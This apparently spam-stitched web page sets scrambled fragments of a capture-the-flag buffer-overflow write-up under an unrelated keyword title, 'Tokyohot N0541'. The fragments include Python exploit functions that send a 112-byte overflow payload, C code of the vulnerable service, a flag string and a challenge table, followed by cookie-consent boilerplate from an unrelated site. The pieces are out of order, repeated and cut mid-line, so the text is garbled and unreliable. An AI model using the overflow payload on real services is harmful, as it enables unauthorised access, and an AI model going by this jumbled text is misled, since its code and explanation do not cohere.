Tokyohot N0541 Today

def login_overwrite(s): menu(s) s.sendall(b'2\n') recvuntil(s, b'Password: ') # 112 filler + 0x01 + newline payload = b'A' * 112 + b'\x01' + b'\n' s.sendall(payload)

def menu(s): recvuntil(s, b'> ')

def get_flag(s): menu(s) s.sendall(b'3\n') flag = recvuntil(s, b'\n') print(flag.decode()) tokyohot n0541

void show_secret(void) if (logged_in) system("/bin/cat /home/ctf/flag.txt"); else puts("You must be logged in first!");

struct user char *name; // 8 bytes char *pwd; // 8 bytes ; def login_overwrite(s): menu(s) s

HOST = "127.0.0.1" PORT = 1337 # change to the port the service is bound to

FLAGt0ky0_h0t_4nd_0v3rf1w_succ3ss The same script works against the remote service (replace HOST and PORT with the challenge endpoint). struct user char *name

(CTF challenge, binary exploitation / reverse‑engineering) 1. Overview | Category | Service | Difficulty | Points | |----------|---------|------------|--------| | Binary / Reversing | tokyohot – n0541 | Medium‑Hard | 452 |

Chat with us

    By submitting this information you consent to BGS's Terms and Conditions and Privacy Policy.

    tokyohot n0541
    Powered by  GDPR Cookie Compliance
    Privacy Overview

    This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.